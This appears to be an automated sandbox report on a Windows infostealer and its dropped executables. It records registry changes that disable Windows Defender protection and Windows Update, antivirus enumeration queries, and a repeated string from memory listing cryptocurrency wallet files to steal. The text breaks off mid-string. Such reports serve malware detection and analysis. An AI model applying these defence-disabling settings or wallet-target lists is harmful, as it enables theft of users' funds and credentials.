Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe\vMcvSUhjRwUjZHoUBOuO.txt VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6235A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C6235A0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FE65E0 LookupAccountNameA, 23_2_00FE65E0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01022517 GetTimeZoneInformation, 23_2_01022517
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file1.exe, 00000018.00000002.2883393880.0000000001351000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823411403.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 23.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3287942560.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2465485176.0000000000721000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file1.exe PID: 1412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2408418198.0000000000414000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo 